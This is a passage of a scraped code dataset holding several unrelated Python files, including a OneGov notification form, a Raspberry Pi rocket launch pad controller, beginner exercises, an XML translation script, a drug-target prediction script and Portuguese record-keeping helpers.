{o.username for o in q}\n\n def recipients_with_unpaid_bills(self):\n period = next((\n p for p in self.request.app.periods\n if p.id.hex == self.period.data\n ), None) or self.request.app.active_period\n\n billing = BillingCollection(self.request, period=period)\n\n return {\n username for username, bill in billing.bills.items()\n if not bill.paid\n }\n\n def recipients_by_occasion_query(self, occasions):\n bookings = BookingCollection(self.request.session)\n\n q = bookings.query()\n q = q.join(Period)\n q = q.join(Booking.occasion)\n if occasions:\n q = q.filter(Booking.occasion_id.in_(occasions))\n else:\n q = q.filter(Booking.occasion_id == uuid4())\n q = q.filter(or_(\n and_(Occasion.cancelled == False, Booking.state == 'accepted'),\n and_(Occasion.cancelled == True, Booking.state == 'cancelled')\n ))\n q = q.filter(Period.active == True)\n q = q.filter(Period.confirmed == True)\n\n return q\n\n def recipients_by_occasion(self, occasions, include_organisers=True):\n q = self.recipients_by_occasion_query(occasions)\n q = q.with_entities(distinct(Booking.username).label('username'))\n\n attendees = {r.username for r in q}\n\n if not include_organisers:\n return attendees\n\n q = OccasionCollection(self.request.session).query()\n q = q.join(Activity)\n q = q.filter(Occasion.id.in_(occasions))\n q = q.with_entities(distinct(Activity.username).label('username'))\n\n organisers = {r.username for r in q}\n\n return attendees | 
organisers\n\n def recipients_count_by_occasion(self, occasions):\n q = self.recipients_by_occasion_query(occasions)\n q = q.with_entities(\n Booking.occasion_id,\n func.count(Booking.occasion_id).label('count')\n )\n q = q.group_by(Booking.occasion_id)\n return {r.occasion_id: r.count for r in q}\n\n @property\n def occasion_choices(self):\n if not self.request.app.active_period:\n return\n\n layout = DefaultLayout(self.model, self.request)\n\n stmt = as_selectable_from_path(\n module_path(\n 'onegov.feriennet',\n 'queries/occasion_choices.sql'\n )\n )\n\n query = select(stmt.c).where(\n stmt.c.period_id == self.request.app.active_period.id\n )\n\n templates = {\n True: _(\n \"${title} (cancelled) \"\n \"${dates}, ${count} Attendees\"\n ),\n False: _(\n \"${title} \"\n \"${dates}, ${count} Attendees\"\n )\n }\n\n for record in self.request.session.execute(query):\n template = templates[record.cancelled]\n label = self.request.translate(_(template, mapping={\n 'title': record.title,\n 'count': record.count,\n 'dates': ', '.join(\n layout.format_datetime_range(*d) for d in record.dates\n )\n }))\n\n yield record.occasion_id.hex, label\n\n def populate_periods(self):\n periods = [p for p in self.request.app.periods]\n periods.sort(key=lambda p: not p.active)\n\n self.period.choices = [(p.id.hex, p.title) for p in periods]\n\n def populate_occasion(self):\n self.occasion.choices = list(self.occasion_choices)\n","repo_name":"OneGov/onegov.feriennet","sub_path":"onegov/feriennet/forms/notification_template.py","file_name":"notification_template.py","file_ext":"py","file_size_in_byte":9852,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"14648795907","text":"#Developed and owned by Benjamin Eckert, Peter Gifford, and Ryan Hansen of Western Michigan University.\n\n#pad.py controls the functionality of launch pad objects that are associated\n#with physical rockets\n\nimport RPi.GPIO as GPIO\nimport time\nfrom camera import take_video\nfrom threading import Thread\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\n\nclass Pad:\n #Constructor\n def __init__(self, name, pinIn, pinOut, pinCC):\n self.pinIn = pinIn\n self.pinOut = pinOut\n self.pinCC = pinCC\n self.connected = False\n self.name = name\n\n #Update connection field by checking physical rocket port connection\n def check_connection(self):\n GPIOpin = self.pinIn\n GPIO.setup(GPIOpin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n state = GPIO.input(GPIOpin)\n if state == False:\n self.connected = True\n else:\n self.connected = False\n\n GPIO.cleanup(GPIOpin)\n\n def launch(self):\n #origional code ---------\n GPIO.setup(self.pinOut,GPIO.OUT)\n GPIO.setup(self.pinCC,GPIO.OUT)\n GPIO.output(self.pinCC,GPIO.HIGH)\n GPIO.output(self.pinOut,GPIO.HIGH)\n GPIO.output(self.pinOut,GPIO.LOW)\n time.sleep(1)\n GPIO.output(self.pinOut,GPIO.HIGH)\n time.sleep(1)\n GPIO.output(self.pinCC,GPIO.LOW)\n \n print(\"Launched \" + self.name)\n\n#Construct a list of pad objects from the pad configuration file\ndef pads_setup():\n #Create empty list and open pad configuration file\n pads = []\n stream = open('/home/pi/RocketLaunch/Source/WebApp/pad.conf', 'r')\n\n #Skip first line, read all lines into a list, initialize index\n next(stream)\n lines = stream.readlines()\n i = 1\n \n #For every line\n for line in lines:\n\n #Get rid of newline at end, split by tab character into a list\n line = line[2:].strip(\"\\n\")\n args = line.split('\\t')\n\n #Create pad object, add to list, iterate index\n pad = Pad('Pad ' 
+ str(i), int(args[0]), int(args[1]), int(args[2]))\n pads.append(pad)\n i = i + 1\n \n #Close the file\n stream.close()\n\n #Return the pad list\n return pads\n","repo_name":"Ryanh627/RocketLaunch","sub_path":"Source/WebApp/pad.py","file_name":"pad.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38739868408","text":"moba_games = {}\nwhile True:\n command = input()\n if command == \"Season end\":\n break\n if \" -> \" in command:\n pps = command.split(\" -> \")\n player, position, skill = pps[0], pps[1], int(pps[2])\n if player not in moba_games:\n moba_games[player] = {position: skill}\n elif position not in moba_games[player]:\n moba_games[player][position] = skill\n else:\n if skill > moba_games[player][position]:\n moba_games[player][position] = skill\n if \" vs \" in command:\n player1, player2 = command.split(\" vs \")\n if player1 in moba_games and player2 in moba_games:\n for position in moba_games[player1]:\n if position in moba_games[player2]:\n player1_total = sum(moba_games[player1].values())\n player2_total = sum(moba_games[player2].values())\n if player1_total > player2_total:\n del moba_games[player2]\n break\n elif player2_total > player1_total:\n del moba_games[player1]\n break\n\nplayers_total = {}\nfor player in moba_games:\n players_total[player] = sum(moba_games[player].values())\nplayers_total = dict(sorted(players_total.items(), key=lambda x: (-x[1], x[0])))\nfor player, total in players_total.items():\n print(f\"{player}: {total} skill\")\n sorted_position = dict(sorted(moba_games[player].items(), key=lambda x: (-x[1], x[0])))\n for key, val in sorted_position.items():\n print(f\"- {key} <::> {val}\")\n","repo_name":"ijestanoff/Judge_Python","sub_path":"python_fundamentals/Dictionaries_More_Exercises/03_moba_challenger.py","file_name":"03_moba_challenger.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25484947215","text":"# 26.Удалить из файла наименьшее нечетное число\r\n# (см. 
замечание к пре-дыдущей задаче).\r\n\r\nf = open(\"test.txt\", \"wb\")\r\nfor i in range(11, 0, -1):\r\n f.write(i.to_bytes(2, byteorder='big', signed=True))\r\nf.close()\r\n\r\nf2 = open(\"test.txt\", \"rb+\")\r\n\r\nnum = f2.read(2)\r\nmn = 0\r\n\r\nwhile num != b'':\r\n\r\n x = int.from_bytes(num, byteorder='big', signed=True)\r\n if x % 2 != 0:\r\n if not mn:\r\n print('Я тут')\r\n mn = x\r\n ind = f2.tell() - 2\r\n elif x < mn:\r\n print(\"Я поменял\")\r\n mn = x\r\n ind = f2.tell() - 2\r\n\r\n num = f2.read(2)\r\n\r\nf2.seek(-2, 2)\r\nlast_n = f2.read(2)\r\nf2.seek(ind, 0)\r\nf2.write(last_n)\r\nf2.seek(-2, 2)\r\nf2.truncate()\r\nf2.close()","repo_name":"akhachatrian1/Project2k","sub_path":"2 файлы/26 (1).py","file_name":"26 (1).py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3599177149","text":"\ndata=[]\ncount = 0\nwith open('reviews.txt', 'r') as f:\n\tfor line in f:\n\t\tdata.append(line.strip())\n\t\tcount +=1 #count = count + 1\n\t\tif count % 1000 ==0: #如果count除以1000的余数是0\n\t\t\tprint(len(data))\nprint('档案读取完了,总共有', len(data), '笔资料')\n\nprint(data[0])\n\n\n\n\nsum_len=0\nfor d in data:\n\tsum_len = sum_len + len(d) # sum_len是指所有留言长度总和; len(d)是指每个留言长度\nprint('留言平均长度是', sum_len/len(data)) #len(data)是指data的个数\n\n\n#------------------------------\n# 找出留言字数小于100的留言有几笔?\nnew=[]\nfor d in data:\n\tif len(d) < 100:\n\t\tnew.append(d)\nprint('一共有', len(new), '笔留言长度小于100')\nprint(new[0])\nprint(new[1])\n\n\n#------------------------------\n#找出留言内包含good的流言有几笔?\n\ngood=[]\nfor d in data:\n\tif 'good' in d:\n\t\tgood.append(d)\nprint('一共有', len(good), '笔留言')\nprint(good[0])\n\n#------------------------------\n#快写法\ngood= [d for d in data if 'good' in d]\nprint(good)\n\nbad= ['bad' in d for d in data]\nprint(bad)\n\n\n\n\n#文字计数\n\nwc = {} #word_count\nfor d in data:\n\twords = d.split(' ')\n\tfor word in words:\n\t\tif word in wc:\n\t\t\twc[word] +=1\n\telse:\n\t\twc[word] = 1 #新增新的key进wc字典\n\n# print(wc)\n\nfor word in wc:\n\tif wc[word] > 100000: #印出出现次数>100次的字字\n\t\tprint(word, wc[word]) #印出字典的字字 与 字出现次数\n\nprint(len(wc)) # 印出字典长度\nprint(wc['Allen']) #查找字典中是否有包含allen的字\n\nwhile True:\n\tword = input('请问你想查什么字: ')\n\tif word == 'q':\n\t\tbreak\n\tif word in wc:\n\t\tprint( word, '出现过的次数为: ', wc[word])\n\telse:\n\t\tprint('这个字没出现过欧~')\n\t\nprint('感谢使用本查询功能')\n\n","repo_name":"DoraSQL/reviews-analytics","sub_path":"filter2.py","file_name":"filter2.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"467815212","text":"# -*- coding: utf-8 -*-\n\nimport hashlib\nimport time\nfrom xml.dom.minidom import parse\n\nimport aliyun\nimport 代理api\n\n\ndef saveip():\n return 代理api.getip()\n\n\nglobal ip\nip = saveip()\n\n\ndef encrypt(signStr):\n hash_algorithm = hashlib.sha256()\n hash_algorithm.update(signStr.encode('utf-8'))\n return hash_algorithm.hexdigest()\n\n\ndef truncate(q):\n if q is None:\n return None\n size = len(q)\n return q if size <= 20 else q[0:10] + str(size) + q[size - 10:size]\n\n\ndef xmlGetAndUpdate(name):\n global ip\n domTree = parse(name)\n # 文档根元素\n rootNode = domTree.documentElement\n print(rootNode.nodeName)\n aaa = 0\n bbb = True\n # 所有list\n lists = rootNode.getElementsByTagName(\"Body\")[0].getElementsByTagName(\"listElem\")\n print(\"****所有信息****\")\n for list in lists:\n if list.hasAttribute(\"id\"):\n\n # if int(list.getAttribute(\"id\"))<8934:\n # continue\n 
# translation 元素\n translation = list.getElementsByTagName(\"translation\")[0]\n original = list.getElementsByTagName(\"original\")[0]\n if not translation.childNodes:\n print(\"id:\", list.getAttribute(\"id\"))\n continue\n if translation.childNodes[0].data != original.childNodes[0].data:\n continue\n\n print(\"id:\", list.getAttribute(\"id\"))\n print(translation.nodeName, \":\", translation.childNodes[0].data)\n if translation.childNodes[0].data == \"\\FFFF\\\\\":\n continue\n if translation.childNodes[0].data == \"--\\F801\\\\\\\\FFFF\\\\\":\n continue\n\n chuli1 = str(translation.childNodes[0].data)\n chuli = \"\"\n tran = \"\"\n for i in chuli1:\n if i == \"\\\\\":\n if chuli != \"\":\n # time.sleep(0.04)\n # tran = tran + connect(chuli, random.randint(0, 9))\n # tran = tran + connect(chuli, aaa%10)\n # tran = tran + connect1(chuli)\n args = {\n 'format_type': 'text',\n 'source_language': 'ja',\n 'target_language': 'zh',\n 'source_text': chuli,\n 'scene': 'general'\n }\n if chuli == '!':\n tran = tran + \"!\"\n else:\n tran = tran + aliyun.Sample.main(args)\n tran = tran + i\n if bbb:\n bbb = False\n else:\n bbb = True\n continue\n if bbb:\n chuli = chuli + i\n else:\n chuli = \"\"\n tran = tran + i\n print(tran)\n print(\"等待0.2s\")\n time.sleep(0.2)\n translation.childNodes[0].data = tran\n if aaa > 10:\n with open(name, 'w', encoding='UTF-8') as f:\n # 缩进 - 换行 - 编码\n domTree.writexml(f, encoding='UTF-8')\n f.close()\n aaa = 0\n else:\n aaa = aaa + 1\n\n with open(name, 'w', encoding='UTF-8') as f:\n # 缩进 - 换行 - 编码\n domTree.writexml(f, encoding='UTF-8')\n f.close()\n\n\ndef xmlGetAndUpdate2(name):\n global ip\n domTree = parse(name)\n # 文档根元素\n rootNode = domTree.documentElement\n print(rootNode.nodeName)\n aaa = 0\n bbb = True\n # 所有list\n lists = rootNode.getElementsByTagName(\"body\")[0].getElementsByTagName(\"id\")\n print(\"****所有信息****\")\n for list in lists:\n\n # if int(list.getAttribute(\"id\"))<8934:\n # continue\n # translation 元素\n translation = list.getElementsByTagName(\"translate\")[0]\n original = list.getElementsByTagName(\"origin\")[0].childNodes[0].data\n if translation.childNodes[0].data != original:\n continue\n if translation.childNodes[0].data == \"NONE\":\n continue\n\n chuli1 = str(translation.childNodes[0].data)\n tran = \"\"\n\n args = {\n 'format_type': 'text',\n 'source_language': 'ja',\n 'target_language': 'zh',\n 'source_text': chuli1,\n 'scene': 'general'\n }\n tran= aliyun.Sample.main(args)\n print(tran)\n print(\"等待0.1s\")\n time.sleep(0.1)\n translation.childNodes[0].data = tran\n if aaa > 10:\n with open(name, 'w', encoding='UTF-8') as f:\n # 缩进 - 换行 - 编码\n domTree.writexml(f, encoding='UTF-8')\n f.close()\n aaa = 0\n else:\n aaa = aaa + 1\n\n with open(name, 'w', encoding='UTF-8') as f:\n # 缩进 - 换行 - 编码\n domTree.writexml(f, encoding='UTF-8')\n f.close()\n\n\n# if __name__ == '__main__':\n# # xmlGetAndUpdate(\"HPI/DICTIONARYREPORT/DICREPORTITEMMSG.xml\")\n# # print(\"OK\")\n# with open(\"xml.txt\", \"r\", encoding='UTF-8') as f:\n# for line in f.readlines():\n# line = line.strip('\\n') # 去掉列表中每一个元素的换行符\n# xmlGetAndUpdate(line)\n# print(\"完成\", line)\n# print(\"全部翻译完成\\n哈哈哈哈哈哈哈\")\nif __name__ == '__main__':\n with open(\"tblxml.txt\", \"r\", encoding='GBK') as f:\n for line in f.readlines():\n line = line.strip('\\n') # 去掉列表中每一个元素的换行符\n xmlGetAndUpdate2(line)\n print(\"完成\", line)\n 
print(\"全部翻译完成\\n哈哈哈哈哈哈哈\")\n","repo_name":"yulan233/Etrian_OdysseyX-Translate","sub_path":"feiqi/网易有道api.py","file_name":"网易有道api.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71977567047","text":"import numpy as np\nimport pandas as pd\nfrom keras.preprocessing import sequence\nimport keras\nfrom keras import backend as K\nfrom keras.models import load_model\nimport argparse\nimport h5py\n\nseq_rdic = ['A','I','L','V','F','W','Y','N','C','Q','M','S','T','D','E','R','H','K','G','P','O','U','X','B','Z']\nseq_dic = {w: i+1 for i,w in enumerate(seq_rdic)}\n\n\ndef encodeSeq(seq, seq_dic):\n if pd.isnull(seq):\n return [0] \n else:\n return [seq_dic[aa] for aa in seq]\n\ndef encodeSeq(seq, seq_dic):\n if pd.isnull(seq):\n return [0]\n else:\n return [seq_dic[aa] for aa in seq]\n\ndef parse_data(dti_dir, drug_dir, protein_dir, with_label=True,\n prot_len=2500, prot_vec=\"Convolution\",\n drug_vec=\"Convolution\", drug_len=2048):\n\n print(\"Parsing {0} , {1}, {2} with length {3}, type {4}\".format(*[dti_dir ,drug_dir, protein_dir, prot_len, prot_vec]))\n\n protein_col = \"Protein_ID\"\n drug_col = \"Compound_ID\"\n col_names = [protein_col, drug_col]\n if with_label:\n label_col = \"Label\"\n col_names += [label_col]\n dti_df = pd.read_csv(dti_dir)\n drug_df = pd.read_csv(drug_dir, index_col=\"Compound_ID\")\n protein_df = pd.read_csv(protein_dir, index_col=\"Protein_ID\")\n\n\n if prot_vec == \"Convolution\":\n protein_df[\"encoded_sequence\"] = protein_df.Sequence.map(lambda a: encodeSeq(a, seq_dic))\n dti_df = pd.merge(dti_df, protein_df, left_on=protein_col, right_index=True)\n dti_df = pd.merge(dti_df, drug_df, left_on=drug_col, right_index=True)\n drug_feature = np.stack(dti_df[drug_vec].map(lambda fp: fp.split(\"\\t\")))\n if prot_vec==\"Convolution\":\n protein_feature = sequence.pad_sequences(dti_df[\"encoded_sequence\"].values, prot_len)\n else:\n protein_feature = np.stack(dti_df[prot_vec].map(lambda fp: fp.split(\"\\t\")))\n if with_label:\n label = dti_df[label_col].values\n print(\"\\tPositive data : %d\" %(sum(dti_df[label_col])))\n print(\"\\tNegative data : %d\" %(dti_df.shape[0] - sum(dti_df[label_col])))\n return {\"protein_feature\": protein_feature, \"drug_feature\": drug_feature, \"label\": label,\n \"Compound_ID\":dti_df[\"Compound_ID\"].tolist(), \"Protein_ID\":dti_df[\"Protein_ID\"].tolist()}\n else:\n return {\"protein_feature\": protein_feature, \"drug_feature\": drug_feature,\n \"Compound_ID\":dti_df[\"Compound_ID\"].tolist(), \"Protein_ID\":dti_df[\"Protein_ID\"].tolist()}\n\n\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"model\")\n # test_params\n parser.add_argument(\"--test-name\", '-n', help=\"Name of test data sets\", nargs=\"*\")\n parser.add_argument(\"--test-dti-dir\", \"-i\", help=\"Test dti [drug, target, [label]]\", nargs=\"*\")\n parser.add_argument(\"--test-drug-dir\", \"-d\", help=\"Test drug information [drug, SMILES,[feature_name, ..]]\", nargs=\"*\")\n parser.add_argument(\"--test-protein-dir\", '-t', help=\"Test Protein information [protein, seq, [feature_name]]\", nargs=\"*\")\n parser.add_argument(\"--with-label\", \"-W\", help=\"Existence of label information in test DTI\", action=\"store_true\", default=False)\n parser.add_argument(\"--output\", \"-o\", help=\"Prediction output\", type=str)\n parser.add_argument(\"--prot-vec\", \"-v\", help=\"Type of protein feature, if Convolution, it will 
execute conlvolution on sequeunce\", type=str, default=\"Convolution\")\n parser.add_argument(\"--prot-len\", \"-l\", help=\"Protein vector length\", default=2500, type=int)\n parser.add_argument(\"--drug-vec\", \"-V\", help=\"Type of drug feature\", type=str, default=\"morgan_fp\")\n parser.add_argument(\"--drug-len\", \"-L\", help=\"Drug vector length\", default=2048, type=int)\n args = parser.parse_args()\n \n model = args.model\n\n test_names = args.test_name\n tests = args.test_dti_dir\n test_proteins = args.test_protein_dir\n test_drugs = args.test_drug_dir\n test_sets = zip(test_names, tests, test_drugs, test_proteins)\n with_label = args.with_label\n output_file = args.output\n\n\n f = h5py.File(model, 'r+')\n\n try:\n f.__delitem__(\"optimizer_weights\")\n except:\n print(\"optimizer_weights are already deleted\")\n\n f.close()\n\n type_params = {\n \"prot_vec\": args.prot_vec,\n \"prot_len\": args.prot_len,\n \"drug_vec\": args.drug_vec,\n \"drug_len\": args.drug_len,\n }\n test_dic = {test_name: parse_data(test_dti, test_drug, test_protein, with_label=with_label, **type_params)\n for test_name, test_dti, test_drug, test_protein in test_sets}\n\n loaded_model = load_model(model)\n print(\"prediction\")\n result_df = pd.DataFrame()\n result_columns = []\n for dataset in test_dic:\n temp_df = pd.DataFrame()\n prediction_dic = test_dic[dataset]\n N = int(np.ceil(prediction_dic[\"drug_feature\"].shape[0]/50))\n d_splitted = np.array_split(prediction_dic[\"drug_feature\"], N)\n p_splitted = np.array_split(prediction_dic[\"protein_feature\"], N)\n predicted = sum([np.squeeze(loaded_model.predict([d,p])).tolist() for d,p in zip(d_splitted, p_splitted)], [])\n temp_df[dataset, 'predicted'] = predicted\n temp_df[dataset, 'Compound_ID'] = prediction_dic[\"Compound_ID\"]\n temp_df[dataset, 'Protein_ID'] = prediction_dic[\"Protein_ID\"]\n if with_label:\n temp_df[dataset, 'label'] = np.squeeze(test_dic[dataset]['label'])\n result_df = pd.concat([result_df, temp_df], ignore_index=True, axis=1)\n result_columns.append((dataset, \"predicted\"))\n result_columns.append((dataset, \"Compound_ID\"))\n result_columns.append((dataset, \"Protein_ID\"))\n if with_label:\n result_columns.append((dataset, \"label\"))\n result_df.columns = pd.MultiIndex.from_tuples(result_columns)\n print(\"save to %s\"%output_file)\n result_df.to_csv(output_file, index=False)\n '''\n predicted = loaded_model.predict([prediction_dic[\"drug_feature\"],prediction_dic[\"protein_feature\"]])\n dti_dic = prediction_dic['dti']\n dti_dic[\"predicted\"] = predicted\n dti_dic.to_csv(output)\n '''\n","repo_name":"GIST-CSBL/DeepConv-DTI","sub_path":"predict_with_model.py","file_name":"predict_with_model.py","file_ext":"py","file_size_in_byte":6064,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"16"} +{"seq_id":"36267230983","text":"\"\"\"\nChecks raw dataset volume\n\"\"\"\n\nimport os\nimport unittest\nfrom constants import ASSETS_PATH\n\n\nclass VolumeCHeckTest(unittest.TestCase):\n \"\"\"\n Checks folder volume is appropriate\n \"\"\"\n def test_folder_is_appropriate(self):\n metas, raws = 0, 0\n for file in os.listdir(ASSETS_PATH):\n if file.endswith(\"_raw.txt\"):\n raws += 1\n if file.endswith(\"_meta.json\"):\n metas += 1\n\n self.assertEqual(metas, raws,\n msg=\"\"\"Collected dataset do not contain equal number of raw_articles and 
metas\"\"\")\n","repo_name":"fipl-hse/2020-2-level-ctlr","sub_path":"config/check_raw_dataset_volume_test.py","file_name":"check_raw_dataset_volume_test.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14248927406","text":"# coding: utf-8\n\ndef Mail2HTML(text, str_list):\n html = \"\"\n colors = [\"#0070C0\", \"#FF0000\", \"#548235\", \"#7030A0\", \"#7F6000\"]\n\n d = str_list.pop(0)\n while text != \"\":\n if(text.startswith(d[\"text\"])):\n if(d[\"type\"] != 5):\n html += '' + d[\"text\"] + ''\n else:\n html += d[\"text\"]\n text = text[len(d[\"text\"]):]\n if(str_list != []):\n d = str_list.pop(0)\n else:\n d = {\"text\":\"\", \"type\":-1 }\n else:\n if text[0] == \"\\n\":\n html += \"
\"\n else:\n html += text[0]\n text = text[1:]\n\n return html\n\n\"\"\"mailText = \"株式会社jack\\n\\\n坂田悠馬様\\n\\\n\\n\\\nいつもお世話になっております。\\n\\\n株式会社NU Creatersの小林です。\\n\\\n\\n\\\n先日ご依頼いただきました商品Aのお見積りが\\n\\\nご用意できましたので、お知らせ申し上げます。\\n\\\n\\n\\\nぜひ直接ご説明させていただきたいと思いますので、\\n\\\n名古屋大学付属図書館に、5月21日(火)の10時からお打ち合わせできますでしょうか。\\n\\\n\\n\\\n住所は、名古屋市千種区不老町です。\\n\\\n\\n\\\n坂田様のご都合をお聞かせいただければ幸いです。\\n\\\n\\n\\\nお忙しいところ申し訳ありませんが、\\n\\\nどうぞよろしくお願いいたします。\\\n\"\n\n_str_List = [[\"株式会社jack\", 0],[\"坂田悠馬\",1],[\"いつもお世話になっております。\",5],\n[\"株式会社NU Creaters\",0],[\"の\",5],[\"小林\",1],[\"です。\",5],\n[\"先日ご依頼いただきました商品Aのお見積りが\",5],[\"ご用意できましたので、お知らせ申し上げます。\",5],\n[\"ぜひ直接ご説明させていただきたいと思いますので、\",5],[\"名古屋大学付属図書館\",2],[\"に、\",5],\n[\"5月21日(火)\",3],[\"の\",5],[\"10時\",3],[\"からお打ち合わせできますでしょうか。\",5],\n[\"住所は、\",5],[\"名古屋市千種区不老町\",4],[\"です。\",5],[\"坂田様のご都合をお聞かせいただければ幸いです。\",5],\n[\"お忙しいところ申し訳ありませんが、\",5],[\"どうぞよろしくお願いいたします。\",5]]\n_str_list = list(map(lambda x:{\"text\":x[0],\"type\":x[1]}, _str_List))\n\nprint(Mail2HTML(mailText, _str_list))\n\"\"\"\n","repo_name":"ayahito-saji/MailColoringProto","sub_path":"api/toHTML.py","file_name":"toHTML.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8088832695","text":"# funções e modelos\n\ndef linha(tam=50):\n return '-' * tam\n\ndef cabecalho(msg):\n print(linha())\n print(f'\\033[1;93m{msg.center(50)}\\033[m') # alinha a mensagem no meio de 42 caracteres\n print(linha())\n\ndef menu(lista):\n cont = 1\n for item in lista:\n print(f'\\033[1;92m[ {cont} ]\\033[m - \\033[1;93m{item}\\033[m')\n cont += 1\n print(linha())\n while True:\n try:\n n = int(input('\\033[1;37mSelecionar Opção:\\033[m '))\n n = abs(n)\n except (ValueError, TypeError):\n print('\\033[1;31mERRO! Digite uma opção válida.\\033[m')\n except KeyboardInterrupt:\n print(\n '\\033[1;31mEntrada de dados interrompida pelo usuário.\\033[m')\n else:\n break\n opcao = n\n return opcao\n\ndef validanome():\n while True:\n try:\n nome = str(input('Nome: ')).strip()\n except (ValueError, TypeError):\n print('\\033[1;31mERRO! Digite uma opção válida.\\033[m')\n except KeyboardInterrupt:\n print(\n '\\033[1;31mEntrada de dados interrompida pelo usuário.\\033[m')\n else:\n break\n return nome\n\ndef validaidade():\n while True:\n try:\n idade = int(input('Idade: '))\n idade = abs(idade)\n except (ValueError, TypeError):\n print('\\033[1;31mERRO! Digite uma opção válida.\\033[m')\n except KeyboardInterrupt:\n print(\n '\\033[1;31mEntrada de dados interrompida pelo usuário.\\033[m')\n else:\n break\n return idade\n\ndef leiaInt(msg):\n o = False\n valor = 0\n while True:\n n = str(input(msg))\n if n.isnumeric():\n valor = int(n)\n o = True\n else:\n print(\"\\033[0;31mDigite um numero inteiro valido\\033[m\")\n if o:\n break\n return valor\n\ndef escreverNovoFuncionario(lista_Funcionario):\n func = lista_Funcionario[0] + \", \" + lista_Funcionario[1] + \", \" + lista_Funcionario[2] + \", \" + lista_Funcionario[3] + \"\\n\"\n arquivo = open('funcionarios.txt', 'a', encoding=\"utf8\")\n arquivo.writelines(func)\n arquivo.close()\n\ndef deletarFuncionario(numero, lista_usuarios):\n limite = len(lista_usuarios) #variavel limite vai reeber a quantidade exata de elementos na lista.\n if numero > limite:\n print(\"Não existe essa opção.\")\n elif numero == 0 or numero == 1 or numero == 2 or numero == 3:\n print('\\033[1;31mERRO! 
Usuário não removível.\\033[m')\n else:\n lista_usuarios.pop(numero - 1) #removendo o elemento no indice exato\n del lista_usuarios[0:3] #removendo os itens dos indices 0,1,2.\n with open('funcionarios.txt', 'w', encoding=\"utf8\") as arquivo:\n for item in lista_usuarios: #reescrevendo no arquivo .txt usuarios(fora os padrões)\n func = item[0] + \", \" + item[1] + \", \" + item[2] + \", \" + item[3] + \"\\n\"\n arquivo.write(func)\n #atualizarLista(user) lembrar de atualizar a variavel listaUsuarios após chamar essa função\n\ndef escreverNovoCliente(lista_Cliente):\n func = lista_Cliente[0] + \", \" + lista_Cliente[1] + \", \" + lista_Cliente[2] + \", \" + lista_Cliente[3] + \", \" + lista_Cliente[4] + \", \" + lista_Cliente[5] + \"\\n\"\n arquivo = open('clientes.txt', 'a', encoding=\"utf8\")\n arquivo.writelines(func)\n arquivo.close()\n\ndef deletarCliente(numero, lista_clientes):\n limite = len(lista_clientes)\n if numero > limite:\n print(\"Não existe essa opção.\")\n else:\n lista_clientes.pop(numero-1)\n #print(lista_clientes)\n with open('clientes.txt', 'w', encoding=\"utf8\") as arquivo:\n for item in lista_clientes:\n func = item[0] + \", \" + item[1] + \", \" + item[2] + \", \" + item[3] + \", \" + item[4] + \", \" + item[5] + \"\\n\"\n arquivo.write(func)\n #atualizarClientes()\n\ndef escreverNovoOrcamento(lista_Orcamento):\n func = lista_Orcamento[0] + \", \" + lista_Orcamento[1] + \", \" + lista_Orcamento[2] + \", \" + lista_Orcamento[3] + \"\\n\"\n arquivo = open('orcamentos.txt', 'a', encoding=\"utf8\")\n arquivo.write(func)\n arquivo.close()\n\ndef escreverNovaOrdem(item):\n func = item[0] + \", \" + item[1] + \", \" + item[2] + \", \" + item[3] + \" - :::::PENDENTE:::::\\n\"\n arquivo = open('ordens.txt', 'a', encoding=\"utf8\")\n arquivo.writelines(func)\n arquivo.close()\n\ndef deletarOrdem(numero, lista_ordens):\n limite = len(lista_ordens)\n if numero > limite:\n print(\"Não existe essa opção.\")\n else:\n lista_ordens.pop(numero-1)\n #print(lista_ordens)\n with open('ordens.txt', 'w', encoding=\"utf8\") as arquivo:\n for item in lista_ordens:\n func = item[0] + \", \" + item[1] + \", \" + item[2] + \", \" + item[3] + \"\\n\"\n arquivo.write(func)\n\ndef escreverOrdemConcluida(item):\n func = item[0] + \", \" + item[1] + \", \" + item[2] + \", \" + item[3] + \" PARA :::::CONCLUÍDA!!!:::::\\n\"\n arquivo = open('ordens.txt', 'w', encoding=\"utf8\")\n arquivo.write(func)\n arquivo.close()\n\ndef deletarOrcamento(numero, lista_orcamentos):\n limite = len(lista_orcamentos)\n if numero > limite:\n print(\"Não existe essa opção.\")\n else:\n lista_orcamentos.pop(numero)\n with open('orcamentos.txt', 'w', encoding=\"utf8\") as arquivo:\n for item in lista_orcamentos:\n func = item[0] + \", \" + item[1] + \", \" + item[2] + \", \" + item[3] + \"\\n\"\n arquivo.write(func)\n\ndef editarFuncionario(numero,lista_Usuarios):\n limite = len(lista_Usuarios)\n if numero > limite:\n print(\"Não existe essa opção.\")\n elif numero == 0 or numero == 1 or numero == 2 or numero == 3:\n print('\\033[1;31mERRO! 
